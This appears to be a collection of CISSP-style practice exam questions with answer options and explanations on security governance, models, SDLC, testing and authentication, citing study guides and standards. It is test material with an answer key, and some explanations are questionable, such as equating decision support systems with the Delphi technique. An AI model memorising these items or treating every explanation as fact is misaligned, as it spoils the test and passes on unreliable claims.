Statistical Anomaly-Based ID - With this method, an IDS acquires data and defines a "normal" usage profile for the network or host that is being monitored.
Source: KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, 2001, John Wiley & Sons, Page 49.
Due care is not related to:
Good faith
Prudent man
Profit
Best interest
Officers and directors of a company are expected to act carefully in fulfilling their tasks. A director shall act in good faith, with the care an ordinarily prudent person in a like position would exercise under similar circumstances and in a manner he reasonably believes is in the best interest of the enterprise. The notion of profit would tend to go against the due care principle.
Source: ANDRESS, Mandy, Exam Cram CISSP, Coriolis, 2001, Chapter 10: Law, Investigation, and Ethics (page 186).
Which of the following is used to monitor network traffic or to monitor host audit logs in real time to determine violations of system security policy that have taken place?
Intrusion Detection System
Compliance Validation System
Intrusion Management System (IMS)
Compliance Monitoring System
An Intrusion Detection System (IDS) is a system that is used to monitor network traffic or to monitor host audit logs in order to determine if any violations of an organization's system security policy have taken place.
Source: KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, 2001, John Wiley & Sons, Page 48.
Which of the following BEST explains why computerized information systems frequently fail to meet the needs of users?
Inadequate quality assurance (QA) tools.
Constantly changing user needs.
Inadequate user participation in defining the system's requirements.
Inadequate project management.
Inadequate user participation in defining the system's requirements. Most projects fail to meet the needs of the users because there was inadequate input in the initial steps of the project from the user community and what their needs really are.
The other answers, while potentially valid, are incorrect because they do not represent the most common problem associated with information systems failing to meet the needs of users.
References: All in One pg 834
Only users can define what their needs are and, therefore, what the system should accomplish. Lack of adequate user involvement, especially in the systems requirements phase, will usually result in a system that doesn't fully or adequately address the needs of the user.
Source: Information Systems Audit and Control Association, Certified Information Systems Auditor 2002 review manual, chapter 6: Business Application System Development, Acquisition, Implementation and Maintenance (page 296).
Risk analysis is MOST useful when applied during which phase of the system development process?
Project initiation and Planning
Functional Requirements definition
System Design Specification
Development and Implementation
In most projects the conditions for failure are established at the beginning of the project. Thus risk management should be established at the commencement of the project with a risk assessment during project initiation.
As it is clearly stated in the ISC2 book: Security should be included in the first phase of development and throughout all of the phases of the system development life cycle. This is a key concept to understand for the purpose of the exam.
The most useful time is to undertake it at project initiation, although it is often valuable to update the current risk analysis at later stages.
Attempting to retrofit security after the SDLC is completed would cost a lot more money and might be impossible in some cases. Look at the family of browsers we use today: for the past 8 years each release has been claimed to be the most secure version ever, yet vulnerabilities are found within days.
Risks should be monitored throughout the SDLC of the project and reassessed when appropriate.
The phases of the SDLC can vary from one source to another. It could be as simple as Concept, Design, and Implementation. It could also be expanded to include more phases, such as this list proposed within the ISC2 Official Study book:
Project Initiation and Planning
Functional Requirements Definition
System Design Specification
Development and Implementation
Documentations and Common Program Controls
Testing and Evaluation Control, certification and accreditation (C&A)
Transition to production (Implementation)
And there are two phases that will extend beyond the SDLC, they are:
Operation and Maintenance Support (O&M)
Revisions and System Replacement (Disposal)
Source: Information Systems Audit and Control Association, Certified Information Systems Auditor 2002 review manual, chapter 6: Business Application System Development, Acquisition, Implementation and Maintenance (page 291).
and
The Official ISC2 Guide to the CISSP CBK , Second Edition, Page 182-185
Which of the following is best defined as an administrative declaration by a designated authority that an information system is approved to operate in a particular security configuration with a prescribed set of safeguards?
Certification
Declaration
Audit
Accreditation
Accreditation: is an administrative declaration by a designated authority that an information system is approved to operate in a particular security configuration with a prescribed set of safeguards. It is usually based on a technical certification of the system's security mechanisms.
Certification: Technical evaluation (usually made in support of an accreditation action) of an information system's security features and other safeguards to establish the extent to which the system's design and implementation meet specified security requirements.
Source: SHIREY, Robert W., RFC2828: Internet Security Glossary, may 2000.
IT security measures should:
Be complex
Be tailored to meet organizational security goals.
Make sure that every asset of the organization is well protected.
Not be developed in a layered fashion.
In general, IT security measures are tailored according to an organization's unique needs. While numerous factors, such as the overriding mission requirements, and guidance, are to be considered, the fundamental issue is the protection of the mission or business from IT security-related, negative impacts. Because IT security needs are not uniform, system designers and security practitioners should consider the level of trust when connecting to other external networks and internal sub-domains. Recognizing the uniqueness of each system allows a layered security strategy to be used - implementing lower assurance solutions with lower costs to protect less critical systems and higher assurance solutions only at the most critical areas.
The more complex the mechanism, the more likely it may possess exploitable flaws. Simple mechanisms tend to have fewer exploitable flaws and require less maintenance. Further, because configuration management issues are simplified, updating or replacing a simple mechanism becomes a less intensive process.
Security designs should consider a layered approach to address or protect against a specific threat or to reduce a vulnerability. For example, the use of a packet-filtering router in conjunction with an application gateway and an intrusion detection system combine to increase the work-factor an attacker must expend to successfully attack the system. Adding good password controls and adequate user training improves the system's security posture even more.
The need for layered protections is especially important when commercial-off-the-shelf (COTS) products are used. Practical experience has shown that the current state-of-the-art for security quality in COTS products does not provide a high degree of protection against sophisticated attacks. It is possible to help mitigate this situation by placing several controls in series, requiring additional work by attackers to accomplish their goals.
Source: STONEBURNER, Gary & al, National Institute of Standards and Technology (NIST), NIST Special Publication 800-27, Engineering Principles for Information Technology Security (A Baseline for Achieving Security), June 2001 (pages 9-10).
What can best be defined as the detailed examination and testing of the security features of an IT system or product to ensure that they work correctly and effectively and do not show any logical vulnerabilities, such as evaluation criteria?
Acceptance testing
Evaluation
Certification
Accreditation
Evaluation as a general term is described as the process of independently assessing a system against a standard of comparison, such as evaluation criteria. Evaluation criteria are defined as a benchmark, standard, or yardstick against which the accomplishment, conformance, performance, and suitability of an individual, hardware, software, product, or plan, as well as its risk-reward ratio, are measured.
What is computer security evaluation?
Computer security evaluation is the detailed examination and testing of the security features of an IT system or product to ensure that they work correctly and effectively and do not show any logical vulnerabilities. The Security Target determines the scope of the evaluation. It includes a claimed level of Assurance that determines how rigorous the evaluation is.
Criteria
Criteria are the "standards" against which security evaluation is carried out. They define several degrees of rigour for the testing and the levels of assurance that each confers. They also define the formal requirements needed for a product (or system) to meet each Assurance level.
TCSEC
The US Department of Defense published the first criteria in 1983 as the Trusted Computer Security Evaluation Criteria (TCSEC), more popularly known as the "Orange Book". The current issue is dated 1985. The US Federal Criteria were drafted in the early 1990s as a possible replacement but were never formally adopted.
ITSEC
During the 1980s, the United Kingdom, Germany, France and the Netherlands produced versions of their own national criteria. These were harmonised and published as the Information Technology Security Evaluation Criteria (ITSEC). The current issue, Version 1.2, was published by the European Commission in June 1991. In September 1993, it was followed by the IT Security Evaluation Manual (ITSEM) which specifies the methodology to be followed when carrying out ITSEC evaluations.
Common Criteria
The Common Criteria represents the outcome of international efforts to align and develop the existing European and North American criteria. The Common Criteria project harmonises ITSEC, CTCPEC (Canadian Criteria) and US Federal Criteria (FC) into the Common Criteria for Information Technology Security Evaluation (CC) for use in evaluating products and systems and for stating security requirements in a standardised way. Increasingly it is replacing national and regional criteria with a worldwide set accepted by the International Organization for Standardization (ISO 15408).
The following answer were not applicable:
Certification is the process of performing a comprehensive analysis of the security features and safeguards of a system to establish the extent to which the security requirements are satisfied. Shon Harris states in her book that Certification is the comprehensive technical evaluation of the security components and their compliance for the purpose of accreditation.
Wikipedia describes it as: Certification is a comprehensive evaluation of the technical and non-technical security controls (safeguards) of an information system to support the accreditation process that establishes the extent to which a particular design and implementation meets a set of specified security requirements
Accreditation is the official management decision to operate a system. Accreditation is the formal declaration by a senior agency official (Designated Accrediting Authority (DAA) or Principal Accrediting Authority (PAA)) that an information system is approved to operate at an acceptable level of risk, based on the implementation of an approved set of technical, managerial, and procedural security controls (safeguards).
Acceptance testing refers to user testing of a system before accepting delivery.
Reference(s) used for this question:
HARE, Chris, Security Architecture and Models, Area 6 CISSP Open Study Guide, January 2002.
and
https://en.wikipedia.org/wiki/Certification_and_Accreditation
and
http://www.businessdictionary.com/definition/evaluation-criteria.html
and
http://www.cesg.gov.uk/products_services/iacs/cc_and_itsec/secevalcriteria.shtml
Which of the following is not a responsibility of an information (data) owner?
Determine what level of classification the information requires.
Periodically review the classification assignments against business needs.
Delegate the responsibility of data protection to data custodians.
Running regular backups and periodically testing the validity of the backup data.
This responsibility would be delegated to a data custodian rather than being performed directly by the information owner.
"Determine what level of classification the information requires" is incorrect. This is one of the major responsibilities of an information owner.
"Periodically review the classification assignments against business needs" is incorrect. This is one of the major responsibilities of an information owner.
"Delegates responsibility of maintenance of the data protection mechanisms to the data custodian" is incorrect. This is a responsibility of the information owner.
References:
CBK p. 105.
AIO3, p. 53-54, 960
Which of the following is not one of the three goals of Integrity addressed by the Clark-Wilson model?
Prevention of the modification of information by unauthorized users.
Prevention of the unauthorized or unintentional modification of information by authorized users.
Preservation of the internal and external consistency.
Prevention of the modification of information by authorized users.
There is no need to prevent modification by authorized users; they are authorized and allowed to make the changes. On top of this, it is also NOT one of the goals of Integrity within Clark-Wilson.
As it turns out, the Biba model addresses only the first of the three integrity goals which is Prevention of the modification of information by unauthorized users. Clark-Wilson addresses all three goals of integrity.
The Clark-Wilson model improves on Biba by focusing on integrity at the transaction level and addressing three major goals of integrity in a commercial environment. In addition to preventing changes by unauthorized subjects, Clark and Wilson realized that high-integrity systems would also have to prevent undesirable changes by authorized subjects and to ensure that the system continued to behave consistently. They also recognized that constant mediation between every subject and every object would be needed if such integrity was going to be maintained.
Integrity is addressed through the following three goals:
1. Prevention of the modification of information by unauthorized users.
2. Prevention of the unauthorized or unintentional modification of information by authorized users.
3. Preservation of the internal and external consistency.
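For illustration, the sketch below captures the flavor of how Clark-Wilson constrains even authorized users: changes to a constrained data item are only permitted through a certified transformation procedure listed in an access triple, and the procedure itself enforces consistency. The roles, procedure names, and balance rule are hypothetical and not a literal rendering of the model.

```python
# Clark-Wilson flavored sketch: authorized users may change data only through
# certified transformation procedures (TPs) listed in access triples.
ACCESS_TRIPLES = {
    ("teller", "post_deposit", "accounts"),   # (user role, TP, constrained data item)
}

accounts = {"ACC-1": 100}   # the constrained data item (CDI)

def post_deposit(cdi: dict, account: str, amount: int) -> None:
    """A well-formed transaction: keeps the CDI internally consistent."""
    if amount <= 0:
        raise ValueError("deposits must be positive")
    cdi[account] = cdi.get(account, 0) + amount

def run_tp(role: str, tp_name: str, cdi_name: str, *args) -> None:
    if (role, tp_name, cdi_name) not in ACCESS_TRIPLES:
        raise PermissionError(f"{role} may not run {tp_name} on {cdi_name}")
    globals()[tp_name](accounts, *args)   # mediation on every access

run_tp("teller", "post_deposit", "accounts", "ACC-1", 50)   # allowed, well-formed
print(accounts)                                             # {'ACC-1': 150}
try:
    run_tp("teller", "post_deposit", "accounts", "ACC-1", -50)
except ValueError as err:
    print("Blocked improper change by an authorized user:", err)
```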
The following reference(s) were used for this question:
Hernandez CISSP, Steven (2012-12-21). Official (ISC)2 Guide to the CISSP CBK, Third Edition ((ISC)2 Press) (Kindle Locations 17689-17694). Auerbach Publications. Kindle Edition.
and
KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, 2001, John Wiley & Sons, Page 31.
Which of the following is a CHARACTERISTIC of a decision support system (DSS) in regards to Threats and Risks Analysis?
DSS is aimed at solving highly structured problems.
DSS emphasizes flexibility in the decision making approach of users.
DSS supports only structured decision-making tasks.
DSS combines the use of models with non-traditional data access and retrieval functions.
DSS emphasizes flexibility in the decision-making approach of users. It is aimed at solving less structured problems, combines the use of models and analytic techniques with traditional data access and retrieval functions and supports semi-structured decision-making tasks.
DSS is sometimes referred to as the Delphi Method or Delphi Technique:
The Delphi technique is a group decision method used to ensure that each member gives an honest opinion of what he or she thinks the result of a particular threat will be. This avoids a group of individuals feeling pressured to go along with others’ thought processes and enables them to participate in an independent and anonymous way. Each member of the group provides his or her opinion of a certain threat and turns it in to the team that is performing the analysis. The results are compiled and distributed to the group members, who then write down their comments anonymously and return them to the analysis group. The comments are compiled and redistributed for more comments until a consensus is formed. This method is used to obtain an agreement on cost, loss values, and probabilities of occurrence without individuals having to agree verbally.
Here is the ISC2 book coverage of the subject:
One of the methods that uses consensus relative to valuation of information is the consensus/modified Delphi method. Participants in the valuation exercise are asked to comment anonymously on the task being discussed. This information is collected and disseminated to a participant other than the original author. This participant comments upon the observations of the original author. The information gathered is discussed in a public forum and the best course is agreed upon by the group (consensus).
EXAM TIP:
The DSS is what some of the books are referring to as the Delphi Method or Delphi Technique. Be familiar with both terms for the purpose of the exam.
The other answers are incorrect:
'DSS is aimed at solving highly structured problems' is incorrect because it is aimed at solving less structured problems.
'DSS supports only structured decision-making tasks' is also incorrect as it supports semi-structured decision-making tasks.
'DSS combines the use of models with non-traditional data access and retrieval functions' is also incorrect as it combines the use of models and analytic techniques with traditional data access and retrieval functions.
Reference(s) used for this question:
Harris, Shon (2012-10-25). CISSP All-in-One Exam Guide, 6th Edition (p. 91). McGraw-Hill. Kindle Edition.
and
Schneiter, Andrew (2013-04-15). Official (ISC)2 Guide to the CISSP CBK, Third Edition : Information Security Governance and Risk Management ((ISC)2 Press) (Kindle Locations 1424-1426). Auerbach Publications. Kindle Edition.
In an organization, an Information Technology security function should:
Be a function within the information systems function of an organization.
Report directly to a specialized business unit such as legal, corporate security or insurance.
Be lead by a Chief Security Officer and report directly to the CEO.
Be independent but report to the Information Systems function.
In order to offer more independence and get more attention from management, an IT security function should be independent from IT and report directly to the CEO. Having it report to a specialized business unit (e.g. legal) is not recommended as it promotes a low technology view of the function and leads people to believe that it is someone else's problem.
Source: HARE, Chris, Security management Practices CISSP Open Study Guide, version 1.0, april 1999.
Which of the following would MOST likely ensure that a system development project meets business objectives?
Development and tests are run by different individuals
User involvement in system specification and acceptance
Development of a project plan identifying all development activities
Strict deadlines and budgets
Effective user involvement is the most critical factor in ensuring that the application meets business objectives.
A great way of getting early input from the user community is by using Prototyping. The prototyping method was formally introduced in the early 1980s to combat the perceived weaknesses of the waterfall model with regard to the speed of development. The objective is to build a simplified version (prototype) of the application, release it for review, and use the feedback from the users’ review to build a second, better version.
This is repeated until the users are satisfied with the product. It is a four-step process:
initial concept,
design and implement initial prototype,
refine prototype until acceptable, and
complete and release final version.
There is also the Modified Prototype Model (MPM). This is a form of prototyping that is ideal for Web application development. It allows the basic functionality of a desired system or component to be formally deployed in a quick time frame. The maintenance phase is set to begin after the deployment. The goal is to have the process be flexible enough that the application is not based on the state of the organization at any given time. As the organization grows and the environment changes, the application evolves with it, rather than being frozen in time.
Reference(s) used for this question:
Hernandez CISSP, Steven (2012-12-21). Official (ISC)2 Guide to the CISSP CBK, Third Edition ((ISC)2 Press) (Kindle Locations 12101-12108 and 12099-12101). Auerbach Publications. Kindle Edition.
and
Information Systems Audit and Control Association, Certified Information Systems Auditor 2002 review manual, chapter 6: Business Application System Development, Acquisition, Implementation and Maintenance (page 296).
Which of the following is often the greatest challenge of distributed computing solutions?
scalability
security
heterogeneity
usability
The correct answer to this question is "security". It is a major factor in deciding if a centralized or decentralized environment is more appropriate.
Example: In a centralized computing environment, you have a central server, and workstations (often "dumb terminals") access applications, data, and everything else from that central server. Therefore, the vast majority of your security resides on a centrally managed server. In a decentralized (or distributed) environment, you have a collection of PCs, each with its own operating system to maintain, its own software to maintain, and local data storage requiring protection and backup. You may also have PDAs, "smart phones", data watches, USB devices of all types able to store data... the list gets longer all the time.
It is entirely possible to reach a reasonable and acceptable level of security in a distributed environment. But doing so is significantly more difficult, requiring more effort, more money, and more time.
The other answers are not correct because:
scalability - A distributed computing environment is almost infinitely scalable. Much more so than a centralized environment. This is therefore a bad answer.
heterogeneity - Having products and systems from multiple vendors in a distributed environment is significantly easier than in a centralized environment. This would not be a "challenge of distributed computing solutions" and so is not a good answer.
usability - This is potentially a challenge in either environment, but whether or not this is a problem has very little to do with whether it is a centralized or distributed environment. Therefore, this would not be a good answer.
Which of the following is not a component of the Operations Security "triples"?
Asset
Threat
Vulnerability
Risk
The Operations Security domain is concerned with triples - threats, vulnerabilities and assets.
Source: KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, 2001, John Wiley & Sons, Page 216.
Which of the following is NOT a basic component of security architecture?
Motherboard
Central Processing Unit (CPU)
Storage Devices
Peripherals (input/output devices)
The CPU, storage devices and peripherals each have specialized roles in the security architecture. The CPU, or microprocessor, is the brains behind a computer system and performs calculations as it solves problems and performs system tasks. Storage devices provide both long- and short-term storage of information that the CPU has either processed or may process. Peripherals (scanners, printers, modems, etc.) are devices that either input data or receive the data output by the CPU.
The motherboard is the main circuit board of a microcomputer and contains the connectors for attaching additional boards. Typically, the motherboard contains the CPU, BIOS, memory, mass storage interfaces, serial and parallel ports, expansion slots, and all the controllers required to control standard peripheral devices.
Reference(s) used for this question:
TIPTON, Harold F., The Official (ISC)2 Guide to the CISSP CBK (2007), page 308.
A trusted system does NOT involve which of the following?
Enforcement of a security policy.
Sufficiency and effectiveness of mechanisms to be able to enforce a security policy.
Assurance that the security policy can be enforced in an efficient and reliable manner.
Independently-verifiable evidence that the security policy-enforcing mechanisms are sufficient and effective.
A trusted system is one that meets its intended security requirements. It involves sufficiency and effectiveness, not necessarily efficiency, in enforcing a security policy. Put succinctly, trusted systems have (1) policy, (2) mechanism, and (3) assurance.
Source: HARE, Chris, Security Architecture and Models, Area 6 CISSP Open Study Guide, January 2002.
As per the Orange Book, what are two types of system assurance?
Operational Assurance and Architectural Assurance.
Design Assurance and Implementation Assurance.
Architectural Assurance and Implementation Assurance.
Operational Assurance and Life-Cycle Assurance.
Operational Assurance and Life-Cycle Assurance are the two types of assurance mentioned in the Orange Book.
The following answers are incorrect:
Operational Assurance and Architectural Assurance. Is incorrect because Architectural Assurance is not a type of assurance mentioned in the Orange book.
Design Assurance and Implementation Assurance. Is incorrect because neither are types of assurance mentioned in the Orange book.
Architectural Assurance and Implementation Assurance. Is incorrect because neither are types of assurance mentioned in the Orange book.
Which must bear the primary responsibility for determining the level of protection needed for information systems resources?
IS security specialists
Senior Management
Senior security analysts
systems Auditors
If there is no support from senior management to implement, execute, and enforce security policies and procedures, then they won't work. Senior management must be involved because they have an obligation to the organization to protect its assets. The requirement here is for management to show "due diligence" in establishing an effective compliance or security program. It is senior management that could face legal repercussions if they do not have sufficient controls in place.
The following answers are incorrect:
IS security specialists. Is incorrect because it is not the best answer. Senior management bears the primary responsibility for determining the level of protection needed.
Senior security analysts. Is incorrect because it is not the best answer. Senior management bears the primary responsibility for determining the level of protection needed.
systems auditors. Is incorrect because it is not the best answer; system auditors are responsible for ensuring that the controls in place are effective. Senior management bears the primary responsibility for determining the level of protection needed.
An effective information security policy should not have which of the following characteristic?
Include separation of duties
Be designed with a short- to mid-term focus
Be understandable and supported by all stakeholders
Specify areas of responsibility and authority
An effective information security policy should be designed with a long-term focus. All other characteristics apply.
Source: ALLEN, Julia H., The CERT Guide to System and Network Security Practices, Addison-Wesley, 2001, Appendix B, Practice-Level Policy Considerations (page 397).
Who is responsible for implementing user clearances in computer-based information systems at the B3 level of the TCSEC rating ?
Security administrators
Operators
Data owners
Data custodians
Security administrator functions include user-oriented activities such as setting user clearances, setting initial password, setting other security characteristics for new users or changing security profiles for existing users. Data owners have the ultimate responsibility for protecting data, thus determining proper user access rights to data.
Source: TIPTON, Hal, (ISC)2, Introduction to the CISSP Exam presentation.
The control of communications test equipment should be clearly addressed by security policy for which of the following reasons?
Test equipment is easily damaged.
Test equipment can be used to browse information passing on a network.
Test equipment is difficult to replace if lost or stolen.
Test equipment must always be available for the maintenance personnel.
Test equipment must be secured. There is equipment and there are other tools that, if in the wrong hands, could be used to "sniff" network traffic and also be used to commit fraud. The storage and use of this equipment should be detailed in the security policy for this reason.
The following answers are incorrect:
Test equipment is easily damaged. Is incorrect because it is not the best answer, and from a security point of view not relevant.
Test equipment is difficult to replace if lost or stolen. Is incorrect because it is not the best answer, and from a security point of view not relevant.
Test equipment must always be available for the maintenance personnel. Is incorrect because it is not the best answer, and from a security point of view not relevant.
References:
OIG CBK Operations Security (pages 642 - 643)
Which of the following is an advantage in using a bottom-up versus a top-down approach to software testing?
Interface errors are detected earlier.
Errors in critical modules are detected earlier.
Confidence in the system is achieved earlier.
Major functions and processing are tested earlier.
The bottom-up approach to software testing begins with the testing of atomic units, such as programs and modules, and works upwards until complete system testing has taken place. The advantages of using a bottom-up approach to software testing are that there is no need for stubs (though simple test drivers are required) and that errors in critical modules are found earlier. The other choices refer to advantages of a top-down approach, which follows the opposite path.
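As a small illustration of the bottom-up order (with a hypothetical atomic function and figures), the lowest-level unit is exercised directly by its own test driver before any higher-level integration or system testing takes place:

```python
# Bottom-up testing sketch: the atomic unit (a tax calculation used by a critical
# billing module) is tested first and directly, so errors in it surface early.
import unittest

def sales_tax(amount_cents: int, rate: float = 0.07) -> int:
    """Atomic unit: compute sales tax in cents, rounded to the nearest cent."""
    return round(amount_cents * rate)

class TestSalesTax(unittest.TestCase):      # the test case acts as the "driver"
    def test_typical_amount(self):
        self.assertEqual(sales_tax(10_000), 700)

    def test_zero_amount(self):
        self.assertEqual(sales_tax(0), 0)

if __name__ == "__main__":
    unittest.main()   # higher-level integration/system tests would come later
```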
Source: Information Systems Audit and Control Association, Certified Information Systems Auditor 2002 review manual, chapter 6: Business Application System Development, Acquisition, Implementation and Maintenance (page 299).
Which of the following is used to interrupt the opportunity to use or perform collusion to subvert operation for fraudulent purposes?
Key escrow
Rotation of duties
Principle of need-to-know
Principle of least privilege
Job rotations reduce the risk of collusion of activities between individuals. Companies with individuals working with sensitive information or systems where there might be the opportunity for personal gain through collusion can benefit by integrating job rotation with segregation of duties. Rotating the position may uncover activities that the individual is performing outside of the normal operating procedures, highlighting errors or fraudulent behavior.
Rotation of duties is a method of reducing the risk associated with a subject performing a (sensitive) task by limiting the amount of time the subject is assigned to perform the task before being moved to a different task.
The following are incorrect answers:
Key escrow is related to the protection of keys in storage by splitting the key in pieces that will be controlled by different departments. Key escrow is the process of ensuring a third party maintains a copy of a private key or key needed to decrypt information. Key escrow also should be considered mandatory for most organization’s use of cryptography as encrypted information belongs to the organization and not the individual; however often an individual’s key is used to encrypt the information.
Separation of duties is a basic control that prevents or detects errors and irregularities by assigning responsibility for different parts of critical tasks to separate individuals, thus limiting the effect a single person can have on a system. One individual should not have the capability to execute all of the steps of a particular process. This is especially important in critical business areas, where individuals may have greater access and capability to modify, delete, or add data to the system. Failure to separate duties could result in individuals embezzling money from the company without the involvement of others.
The need-to-know principle specifies that a person must not only be cleared to access classified or other sensitive information, but must also have a requirement for such information in order to carry out assigned job duties. Ordinary or limited user accounts are what most users are assigned. They should be restricted only to those privileges that are strictly required, following the principle of least privilege. Access should be limited to specific objects following the principle of need-to-know.
The principle of least privilege requires that each subject in a system be granted the most restrictive set of privileges (or lowest clearance) needed for the performance of authorized tasks. Least privilege refers to granting users only the accesses that are required to perform their job functions. Some employees will require greater access than others based upon their job functions. For example, an individual performing data entry on a mainframe system may have no need for Internet access or the ability to run reports regarding the information that they are entering into the system. Conversely, a supervisor may have the need to run reports, but should not be provided the capability to change information in the database.
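A minimal sketch of the least privilege idea, using invented roles and permission names, is a default-deny check against each role's minimal permission set:

```python
# Least-privilege sketch: each role gets only the permissions its job requires,
# and anything not explicitly granted is denied. Roles and permissions are made up.
ROLE_PERMISSIONS = {
    "data_entry_clerk": {"record:create"},
    "supervisor": {"record:create", "report:run"},
}

def is_allowed(role: str, permission: str) -> bool:
    """Default-deny check against the role's minimal permission set."""
    return permission in ROLE_PERMISSIONS.get(role, set())

print(is_allowed("data_entry_clerk", "record:create"))   # True: needed for the job
print(is_allowed("data_entry_clerk", "report:run"))      # False: not required, so not granted
print(is_allowed("supervisor", "record:update"))         # False: supervisors run reports, not change data
```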
Reference(s) used for this question:
Hernandez CISSP, Steven (2012-12-21). Official (ISC)2 Guide to the CISSP CBK, Third Edition ((ISC)2 Press) (Kindle Locations 10628-10631). Auerbach Publications. Kindle Edition.
and
Hernandez CISSP, Steven (2012-12-21). Official (ISC)2 Guide to the CISSP CBK, Third Edition ((ISC)2 Press) (Kindle Locations 10635-10638). Auerbach Publications. Kindle Edition.
and
Hernandez CISSP, Steven (2012-12-21). Official (ISC)2 Guide to the CISSP CBK, Third Edition ((ISC)2 Press) (Kindle Locations 10693-10697). Auerbach Publications. Kindle Edition.
and
Hernandez CISSP, Steven (2012-12-21). Official (ISC)2 Guide to the CISSP CBK, Third Edition ((ISC)2 Press) (Kindle Locations 16338-16341). Auerbach Publications. Kindle Edition.
Configuration Management controls what?
Auditing of changes to the Trusted Computing Base.
Control of changes to the Trusted Computing Base.
Changes in the configuration access to the Trusted Computing Base.
Auditing and controlling any changes to the Trusted Computing Base.
All of these are components of Configuration Management.
The following answers are incorrect:
Auditing of changes to the Trusted Computing Base. Is incorrect because it refers only to auditing the changes, but nothing about controlling them.
Control of changes to the Trusted Computing Base. Is incorrect because it refers only to controlling the changes, but nothing about ensuring the changes will not lead to a weakness or fault in the system.
Changes in the configuration access to the Trusted Computing Base. Is incorrect because this does not refer to controlling the changes or ensuring the changes will not lead to a weakness or fault in the system.
Which of the following is based on the premise that the quality of a software product is a direct function of the quality of its associated software development and maintenance processes?
The Software Capability Maturity Model (CMM)
The Spiral Model
The Waterfall Model
Expert Systems Model
The Capability Maturity Model (CMM) is a service mark owned by Carnegie Mellon University (CMU) and refers to a development model elicited from actual data. The data was collected from organizations that contracted with the U.S. Department of Defense, who funded the research, and became the foundation from which CMU created the Software Engineering Institute (SEI). Like any model, it is an abstraction of an existing system.
The Capability Maturity Model (CMM) is a methodology used to develop and refine an organization's software development process. The model describes a five-level evolutionary path of increasingly organized and systematically more mature processes. CMM was developed and is promoted by the Software Engineering Institute (SEI), a research and development center sponsored by the U.S. Department of Defense (DoD). SEI was founded in 1984 to address software engineering issues and, in a broad sense, to advance software engineering methodologies. More specifically, SEI was established to optimize the process of developing, acquiring, and maintaining heavily software-reliant systems for the DoD. Because the processes involved are equally applicable to the software industry as a whole, SEI advocates industry-wide adoption of the CMM.
The CMM is similar to ISO 9001, one of the ISO 9000 series of standards specified by the International Organization for Standardization (ISO). The ISO 9000 standards specify an effective quality system for manufacturing and service industries; ISO 9001 deals specifically with software development and maintenance. The main difference between the two systems lies in their respective purposes: ISO 9001 specifies a minimal acceptable quality level for software processes, while the CMM establishes a framework for continuous process improvement and is more explicit than the ISO standard in defining the means to be employed to that end.
CMM's Five Maturity Levels of Software Processes
At the initial level, processes are disorganized, even chaotic. Success is likely to depend on individual efforts, and is not considered to be repeatable, because processes would not be sufficiently defined and documented to allow them to be replicated.
At the repeatable level, basic project management techniques are established, and successes could be repeated, because the requisite processes would have been established, defined, and documented.
At the defined level, an organization has developed its own standard software process through greater attention to documentation, standardization, and integration.
At the managed level, an organization monitors and controls its own processes through data collection and analysis.
At the optimizing level, processes are constantly being improved through monitoring feedback from current processes and introducing innovative processes to better serve the organization's particular needs.
When it is applied to an existing organization's software development processes, it allows an effective approach toward improving them. Eventually it became clear that the model could be applied to other processes. This gave rise to a more general concept that is applied to business processes and to developing people.
CMM is superseded by CMMI
The CMM model proved useful to many organizations, but its application in software development has sometimes been problematic. Applying multiple models that are not integrated within and across an organization could be costly in terms of training, appraisals, and improvement activities. The Capability Maturity Model Integration (CMMI) project was formed to sort out the problem of using multiple CMMs.
For software development processes, the CMM has been superseded by Capability Maturity Model Integration (CMMI), though the CMM continues to be a general theoretical process capability model used in the public domain.
CMM is adapted to processes other than software development
The CMM was originally intended as a tool to evaluate the ability of government contractors to perform a contracted software project. Though it comes from the area of software development, it can be, has been, and continues to be widely applied as a general model of the maturity of processes (e.g., IT Service Management processes) in IS/IT (and other) organizations.
Source:
http://searchsoftwarequality.techtarget.com/sDefinition/0,,sid92_gci930057,00.html
and
http://en.wikipedia.org/wiki/Capability_Maturity_Model
How can an individual/person best be identified or authenticated to prevent local masquerading attacks?
UserId and password
Smart card and PIN code
Two-factor authentication
Biometrics
The only way to be truly positive in authenticating identity for access is to base the authentication on the physical attributes of the persons themselves (i.e., biometric identification). Physical attributes cannot be shared, borrowed, or duplicated. They ensure that you do identify the person; however, they are not perfect and may have to be supplemented by another factor.
Some people are thrown off by the term masquerade. In general, a masquerade is a disguise. In terms of communications security issues, a masquerade is a type of attack where the attacker pretends to be an authorized user of a system in order to gain access to it or to gain greater privileges than they are authorized for. A masquerade may be attempted through the use of stolen logon IDs and passwords, through finding security gaps in programs, or through bypassing the authentication mechanism. Spoofing is another term used to describe this type of attack.
A UserId only provides for identification.
A password is a weak authentication mechanism since passwords can be disclosed, shared, written down, and more.
A smart card can be stolen and its corresponding PIN code can be guessed by an intruder. A smart card can also be lent to a friend, and you would have no clue as to who is really logging in using that smart card.
Any form of two-factor authentication not involving biometrics cannot be as reliable as a biometric system to identify the person.
Biometric identifying verification systems control people. If the person with the correct hand, eye, face, signature, or voice is not present, the identification and verification cannot take place and the desired action (i.e., portal passage, data, or resource access) does not occur.
As has been demonstrated many times, adversaries and criminals obtain and successfully use access cards, even those that require the addition of a PIN. This is because these systems control only pieces of plastic (and sometimes information), rather than people. Real asset and resource protection can only be accomplished by people, not cards and information, because unauthorized persons can (and do) obtain the cards and information.
Further, life-cycle costs are significantly reduced because no card or PIN administration system or personnel are required. The authorized person does not lose physical characteristics (i.e., hands, face, eyes, signature, or voice), but cards and PINs are continuously lost, stolen, or forgotten. This is why card access systems require systems and people to administer, control, record, and issue (new) cards and PINs. Moreover, the cards are an expensive and recurring cost.
NOTE FROM CLEMENT:
This question has been generating lots of interest. The keyword in the question is: Individual (the person) and also the authenticated portion as well.
I totally agree with you that two-factor or strong authentication would be the strongest means of authentication. However, the question is not asking what is the strongest means of authentication; it is asking what is the best way to identify the user (individual) behind the technology. When answering questions, do not assume facts not presented in the question or answers.
Nothing can beat biometrics in such a case. You cannot lend your fingerprint and PIN to someone else, and you cannot borrow one of my eyeballs to defeat an iris or retina scan. This is why it is the best method to authenticate the user.
I think the reference is playing with semantics and that makes it a bit confusing. I have improved the question to make it a lot clearer, and I have also improved the explanations attached to the question.
